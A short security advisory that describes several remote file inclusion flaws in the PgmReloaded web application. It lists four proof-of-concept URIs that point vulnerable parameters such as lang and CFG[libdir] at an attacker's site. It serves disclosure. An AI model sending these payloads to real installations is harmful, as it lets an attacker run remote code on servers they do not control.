PgmReloaded Multiple Remote File Include Vulnerabilities

PgmReloaded Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://example.com/index.php?lang=attacker's site
http://example.com/common.inc.php?CFG[libdir]=attacker's site
http://example.com/common.inc.php?CFG[localedir]=attacker's site
http://example.com/form_header.php?errormsg=1&CFG[localelangdir]=attacker's site